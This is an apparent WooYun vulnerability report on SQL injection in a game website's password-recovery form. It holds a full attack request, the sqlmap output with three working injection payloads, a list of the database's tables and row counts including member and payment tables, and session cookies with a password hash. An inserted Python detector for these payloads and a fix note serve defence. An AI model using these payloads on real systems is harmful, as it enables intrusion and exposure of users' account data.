WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online ------------------------- http://drop.zone.ci/
2016-04-02: Details reported to the vendor; awaiting vendor handling
2016-04-06: Vendor has confirmed; details disclosed to the vendor only
2016-04-16: Details disclosed to core white hats and relevant domain experts
2016-04-26: Details disclosed to regular white hats
2016-05-06: Details disclosed to intern white hats
2016-05-21: Details disclosed to the public
As titled.
http://**.**.**.**/user_findpwd.php?t=email
POST http://**.**.**.**/user_findpwd.php?t=doemail HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/user_findpwd.php?t=email
Cookie: Hm_lvt_878250ef6d9058d8708994370fb5132c=1459546008; Hm_lpvt_878250ef6d9058d8708994370fb5132c=1459549499; PHPSESSID=144d2qapb7kfrshd3jdrgv1m76; bdshare_firstime=1459549345620; mrand=243969013; msign=e777f9591b90b0ec41549c14f3e2ea66; MemberName=chinasea; NickName=sea; MemberId=3945514; MemberPass=3d3e9afcb73af50299c8ff572daebb46; bmforumerboardidnum=219
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 77

data%5Bname%5D=1111&data%5Bemail%5D=111111111%**.**.**.**&sub=%E6%8F%90%E4%BA%A4

The data%5Bname%5D parameter (data[name]) is injectable.
sqlmap identified the following injection point(s) with a total of 358 HTTP(s) requests:
---
Parameter: data[name] (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: data[name]=-1228' OR 5159=5159#&data[email]=111111111@**.**.**.**&sub=%E6%8F%90%E4%BA%A4

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: data[name]=-5681' OR 1 GROUP BY CONCAT(0x71706a6b71,(SELECT (CASE WHEN (3827=3827) THEN 1 ELSE 0 END)),0x716b767671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&data[email]=111111111@**.**.**.**&sub=%E6%8F%90%E4%BA%A4

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: data[name]=1111' AND (SELECT * FROM (SELECT(SLEEP(5)))XyKJ)#&data[email]=111111111@**.**.**.**&sub=%E6%8F%90%E4%BA%A4
---
[06:38:13] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5.0.12
The data is as follows:
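As an added example for this report (not code from the site or from sqlmap), the following Python decodes the PHP-style nested form parameter data[name] and flags the three payload shapes sqlmap reported against user_findpwd.php; the sample bodies and the e-mail address in them are constructed.

```python
"""Flag SQL-injection probes in url-encoded POST bodies whose parameters use
PHP-style nesting (data[name]). Added example for this report, not code from
the site; the form bodies below are constructed from the payload shapes
sqlmap reported against user_findpwd.php."""
import re
from urllib.parse import parse_qsl, urlencode

# One pattern per technique sqlmap reported: boolean-based blind (' OR n=n#),
# error-based (GROUP BY CONCAT(... RAND(0) ...)) and time-based (SLEEP(n)).
# Kept narrow so ordinary names and e-mail addresses do not trip them.
SQLI_PATTERNS = [
    re.compile(r"'\s*(?:OR|AND)\s+\d+\s*=\s*\d+\s*#", re.I),           # boolean blind
    re.compile(r"GROUP\s+BY\s+CONCAT\s*\(.*RAND\s*\(", re.I | re.S),  # error-based
    re.compile(r"SLEEP\s*\(\s*\d+\s*\)", re.I),                       # time-based
]

def flatten_params(body: str) -> dict:
    """Decode a form body; a key like data[name] becomes the path data.name,
    so a rule can target the exact field the report names."""
    out = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        out[re.sub(r"\[([^\]]*)\]", r".\1", key)] = value
    return out

def find_sqli(body: str) -> dict:
    """Map each parameter path whose value matches to the index of the
    technique pattern that matched (empty dict when the body looks clean)."""
    hits = {}
    for path, value in flatten_params(body).items():
        for idx, pattern in enumerate(SQLI_PATTERNS):
            if pattern.search(value):
                hits[path] = idx
                break
    return hits

def make_body(name: str, email: str = "111111111@example.invalid") -> str:
    """Constructed recovery-form body with the same three fields as the report."""
    return urlencode({"data[name]": name, "data[email]": email, "sub": "提交"})

# Constructed samples: one benign submission and the three sqlmap payloads.
SAMPLES = {
    "benign": make_body("alice"),
    "boolean": make_body("-1228' OR 5159=5159#"),
    "error": make_body("-5681' OR 1 GROUP BY CONCAT(0x71706a6b71,(SELECT (CASE WHEN "
                       "(3827=3827) THEN 1 ELSE 0 END)),0x716b767671,FLOOR(RAND(0)*2)) "
                       "HAVING MIN(0)#"),
    "time": make_body("1111' AND (SELECT * FROM (SELECT(SLEEP(5)))XyKJ)#"),
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, find_sqli(body))
```

The same check belongs in the application itself only as a secondary control: the actual fix is to bind data[name] as a parameter in a prepared statement rather than concatenating it into the query.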
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| ebogame_member_login              | 4026283 |
| ebogame_member                    | 2350328 |
| ebogame_activation                |  826836 |
| ebogame_member_integral           |  691708 |
| ebogame_charge_20160118           |  465322 |
| pre_ucenter_members               |  388347 |
| bbs_userlist                      |  340566 |
| ebogame_member_info               |  292054 |
| ebogame_member_serv               |  292044 |
| ebogame_member_char               |  241395 |
| ebogame_charge                    |  175353 |
| api_send_mail                     |   61235 |
| ebogame_advertising_click         |   52260 |
| pre_common_district               |   45051 |
| ebogame_charge_copy               |   43282 |
| ebogame_questions                 |   36047 |
| pre_forum_post                    |   27728 |
| ebogame_game_gift_code_17173      |   20000 |
| pre_home_notification             |   14236 |
| pre_common_credit_rule_log        |   13014 |
| pre_forum_thread                  |   12229 |
| pre_forum_threadpartake           |   10744 |
| pre_forum_threadmod               |    9011 |
| pre_common_member_count           |    8182 |
| pre_common_member_field_forum     |    8182 |
| pre_common_member_field_home      |    8182 |
| pre_common_member_profile         |    8182 |
| pre_common_member_status          |    8182 |
| pre_common_member                 |    8174 |
| pre_common_onlinetime             |    6443 |
| ebogame_game_code                 |    6210 |
| bbs_posts                         |    5157 |
| ebogame_game_gift_code            |    5000 |
| pre_forum_statlog                 |    4990 |
| pre_ucenter_memberfields          |    4811 |
| ebogame_member_price              |    3442 |
| ebogame_game_gift_code_           |    3000 |
| ebogame_content                   |    2640 |
| ebogame_extension_member          |    2591 |
| ebogame_news                      |    2288 |
| bbs_apclog                        |    2061 |
| ebogame_question_reply            |    1668 |
| pre_forum_attachment              |    1566 |
| pre_forum_pollvoter               |    1455 |
| bbs_actlogs                       |    1449 |
| pre_common_member_crime           |    1239 |
| pre_forum_modwork                 |    1003 |
| pre_common_stat                   |     899 |
| bbs_threads                       |     874 |
| pre_forum_thread_moderate         |     653 |
| ebogame_charge_heepay             |     591 |
| bbs_primsg                        |     517 |
| pre_common_member_action_log      |     496 |
| pre_ucenter_pm_indexes            |     419 |
| pre_forum_threadimage             |     405 |
| pre_common_setting                |     392 |
| ebogame_game_areas                |     358 |
| pre_forum_polloption              |     273 |
| pre_ucenter_pm_members            |     244 |
| pre_forum_attachment_1            |     222 |
| pre_forum_attachment_3            |     212 |
| pre_forum_attachment_4            |     180 |
| pre_forum_post_tableid            |     174 |
| pre_forum_attachment_9            |     168 |
| pre_forum_attachment_5            |     161 |
| sglj_extension                    |     154 |
| ebogame_advertising               |     151 |
| pre_ucenter_pm_lists              |     129 |
| pre_forum_attachment_7            |     124 |
| pre_common_tagitem                |     118 |
| bbs_ugoptlist                     |     115 |
| pre_ucenter_pm_messages_0         |     114 |
| pre_forum_threaddisablepos        |     110 |
| pre_forum_attachment_6            |     106 |
| pre_common_block_style            |     103 |
| pre_forum_attachment_unused       |     103 |
| pre_forum_attachment_0            |     102 |
| pre_forum_attachment_2            |     102 |
| pre_common_syscache               |      95 |
| pre_ucenter_notelist              |      90 |
| pre_common_smiley                 |      85 |
| pre_forum_attachment_8            |      85 |
| pre_forum_rsscache                |      80 |
| pre_ucenter_pm_messages_3         |      70 |
| pre_common_admincp_perm           |      67 |
| pre_common_member_profile_setting |      51 |
| pre_forum_poll                    |      49 |
| pre_ucenter_pm_messages_7         |      49 |
| pre_common_tag                    |      48 |
| pre_common_nav                    |      47 |
| pre_common_stylevar               |      45 |
| pre_ucenter_newpm                 |      40 |
| pre_forum_forumfield              |      38 |
| pre_forum_forum                   |      37 |
| pre_common_credit_log             |      36 |
| pre_ucenter_pm_messages_5         |      35 |
| ebogame_category                  |      33 |
| ebogame_price                     |      33 |
| pre_home_friend                   |      32 |
| pre_common_credit_rule            |      31 |
| pre_ucenter_pm_messages_2         |      31 |
| pre_home_friend_request           |      30 |
| pre_ucenter_pm_messages_6         |      29 |
| pre_ucenter_settings              |      26 |
| bbs_emoticons                     |      25 |
| ebogame_games                     |      25 |
| pre_ucenter_pm_messages_4         |      25 |
| bbs_search                        |      23 |
| pre_ucenter_pm_messages_8         |      23 |
| ebogame_extension_percent         |      22 |
| pre_ucenter_pm_messages_9         |      22 |
| ebogame_extension_settlemen       |      21 |
| pre_ucenter_pm_messages_1         |      21 |
| pre_common_cron                   |      18 |
| pre_common_usergroup              |      16 |
| pre_common_usergroup_field        |      16 |
| pre_home_friendlog                |      16 |
| bbs_forumdata                     |      15 |
| bbs_tags                          |      15 |
| pre_home_click                    |      15 |
| pre_common_report                 |      14 |
| pre_forum_threadclosed            |      14 |
| bbs_contacts                      |      13 |
| pre_forum_replycredit             |      13 |
| bbs_levels                        |      12 |
| pre_common_banned                 |      12 |
| pre_common_session                |      11 |
| pre_forum_poststick               |      11 |
| ebogame_game_gift_info_17173      |      10 |
| pre_forum_medal                   |      10 |
| ebogame_integral                  |       9 |
| pre_common_plugin                 |       9 |
| pre_home_favorite                 |       9 |
| bbs_usergroup                     |       8 |
| bbs_polls                         |       7 |
| pre_forum_warning                 |       7 |
| ebogame_extension                 |       6 |
| pre_common_pluginvar              |       6 |
| pre_forum_moderator               |       6 |
| pre_forum_typeoption              |       6 |
| pre_common_admincp_group          |       5 |
| pre_common_friendlink             |       5 |
| pre_common_admingroup             |       4 |
| pre_common_advertisement          |       4 |
| pre_forum_bbcode                  |       4 |
| pre_forum_onlinelist              |       4 |
| ebogame_game_gift_info_           |       3 |
| pre_common_admincp_member         |       3 |
| pre_common_failedlogin            |       3 |
| pre_forum_grouplevel              |       3 |
| pre_forum_imagetype               |       3 |
| pre_common_admincp_cmenu          |       2 |
| pre_common_block                  |       2 |
| pre_common_credit_rule_log_field  |       2 |
| pre_common_diy_data               |       2 |
| pre_common_patch                  |       2 |
| pre_common_regip                  |       2 |
| pre_common_template_block         |       2 |
| pre_common_word_type              |       2 |
| pre_home_poke                     |       2 |
| pre_home_pokearchive              |       2 |
| pre_mobile_setting                |       2 |
| bbs_favorites                     |       1 |
| bbs_lastest                       |       1 |
| pre_common_admincp_session        |       1 |
| pre_common_cache                  |       1 |
| pre_common_statuser               |       1 |
| pre_common_style                  |       1 |
| pre_common_template               |       1 |
| pre_ucenter_admins                |       1 |
| pre_ucenter_applications          |       1 |
| pre_ucenter_failedlogins          |       1 |
+-----------------------------------+---------+
Severity level: Medium
Vulnerability Rank: 10
Confirmation time: 2016-04-06 11:41
CNVD has not directly reproduced the described issue and has not yet established a direct handling channel with the website's operating organization; pending claim.
None yet.